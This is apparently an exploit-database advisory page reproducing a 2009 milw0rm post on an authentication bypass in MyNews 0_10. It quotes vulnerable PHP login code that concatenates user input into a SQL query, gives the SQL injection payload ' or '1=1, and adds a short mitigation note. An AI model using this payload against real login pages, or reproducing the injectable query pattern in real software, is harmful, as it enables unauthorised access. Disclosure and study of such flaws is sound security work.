header-logo
Suggest Exploit
vendor:
MyNews 0_10
by:
x0r
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: MyNews 0_10
Affected Version From: 0_10
Affected Version To: 0_10
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

MyNews 0_10 Auth Bypass

MyNews 0_10 is vulnerable to an authentication bypass vulnerability due to insufficient input validation. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with the ' or '1=1' payload to the vulnerable application. This will bypass the authentication process and allow the attacker to gain access to the application.

Mitigation:

Input validation should be performed to ensure that user-supplied data is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

#########################################################################################
[0x01] Informations:

Name           : Mynews 0_10
Download       :
http://prdownloads.sourceforge.net/mynews/mynews_beta_0_10.zip?download
Vulnerability  : Auth Bypass
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/login.php

[Code]
if ( $request == "POST" )
{
	$username = $_POST['username'];
	$passwd = $_POST['passwd'];
	
	// Call mysql class
	$db = new db;
	$db->info['sql_host']		=	$conf['sql_host'];
	$db->info['sql_user']		=	$conf['sql_user'];
	$db->info['sql_pass']		=	$conf['sql_pass'];
	$db->info['sql_db']		=	$conf['sql_db'];
	$db->connect();
	$sql = "SELECT * FROM users WHERE username='$username' &&
password='$passwd' ";
	$check_query = $db->query($sql);
	$row = mysql_numrows($check_query);
[/code]

#########################################################################################
[0x03] Exploit:

Exploit: ' or '1=1

########################################################################################

# milw0rm.com [2009-02-10]